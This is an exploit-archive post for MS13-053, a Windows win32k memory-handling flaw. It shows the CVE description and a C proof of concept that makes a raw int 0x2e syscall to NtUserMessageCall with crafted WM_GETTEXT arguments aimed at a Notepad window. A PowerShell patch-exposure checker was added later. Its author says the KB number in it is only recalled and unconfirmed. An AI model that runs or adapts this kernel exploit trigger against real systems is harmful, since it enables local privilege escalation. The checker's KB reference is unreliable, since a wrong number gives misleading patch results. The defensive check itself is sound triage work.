
MS13-053 Win32k Memory Allocation Vulnerability

Published: 2013-09-12 00:00:00
Author: 0xbigban
Source: 0day.today
39

EPSS: 0.001 (percentile 40.9%)

win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka “Win32k Memory Allocation Vulnerability.”

/*
	more details:
	https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up-kernel-exploit/
	this poc is written by 0xBigBan
*/
#include <windows.h>
#include <stdlib.h>   /* malloc */

#define __NtUserMessageCall 0x11ea //on win7 sp1 x86 (syscall numbers differ between builds)

/* Minimal x86 syscall stub (MSVC inline asm): edx points at the arguments
   pushed by the caller, eax carries the service number. */
void SystemCall(DWORD ApiNumber, ...) {
	__asm{
		lea edx, [ebp+0x0c]
		mov eax, ApiNumber
		int 0x2e
		leave
		ret
	}
}

int main() {
	//a file named a.txt must already be open in Notepad (window title "a.txt - notepad")
	HWND handle = FindWindowA(NULL, "a.txt - notepad");
	void* ptr = malloc(sizeof(int)*2);

	SystemCall(__NtUserMessageCall,
				handle,
				WM_GETTEXT,
				0x8,	//buffer size
				ptr,	//user mode buffer
				0x0,
				0x2b3,
				0x2);	//ASCII boolean/flag
	return 0;
}
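As an added defender-side example that is not part of the 0day.today post, the script below reports whether a host falls in the affected-version range named in the description above (Windows XP through Windows 8 / Server 2012 / RT) and whether the bulletin's update is present. It assumes MS13-053 shipped as hotfix KB2850851; that KB number is my recollection of the bulletin, not something stated on this page, so confirm it against the Microsoft bulletin before relying on the result. `Get-WmiObject` and `Get-HotFix` are used rather than the CIM cmdlets so it also runs under PowerShell 2.0 on the older systems in scope.

```powershell
# Added example (not the PoC author's code): MS13-053 exposure check for one host.
function Test-MS13053Exposure {
    param(
        # Assumed KB for MS13-053; verify against the bulletin before use.
        [string]$KB = 'KB2850851'
    )

    $os    = Get-WmiObject Win32_OperatingSystem
    $build = [version]$os.Version

    # Affected kernels per the advisory text:
    #   5.1 XP, 5.2 Server 2003, 6.0 Vista / Server 2008,
    #   6.1 Windows 7 / Server 2008 R2, 6.2 Windows 8 / Server 2012 / RT.
    # Anything at 6.3 or later was never in scope for this bulletin.
    $inScope = ($build -ge [version]'5.1') -and ($build -lt [version]'6.3')

    # Get-HotFix queries Win32_QuickFixEngineering; absence of the KB on an
    # in-scope host is the condition worth alerting on.
    $patched = [bool](Get-HotFix -Id $KB -ErrorAction SilentlyContinue)

    $status = if (-not $inScope) { 'NotAffected' }
              elseif ($patched)  { 'Patched' }
              else               { 'VULNERABLE' }

    New-Object PSObject -Property @{
        ComputerName = $env:COMPUTERNAME
        Caption      = $os.Caption
        OSVersion    = $os.Version
        InScope      = $inScope
        HotfixFound  = $patched
        Status       = $status
    }
}

# Usage: run elevated or as a user allowed to read WMI; pipe across hosts
# with Invoke-Command for fleet-wide coverage.
Test-MS13053Exposure | Format-List ComputerName, Caption, OSVersion, InScope, HotfixFound, Status
```

A host reporting `InScope = True` and `HotfixFound = False` is the one that should be prioritised; note that a missing hotfix entry can also mean a later cumulative rollup superseded the KB, so treat the result as a triage signal rather than a final verdict.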

#  0day.today [2018-02-18]  #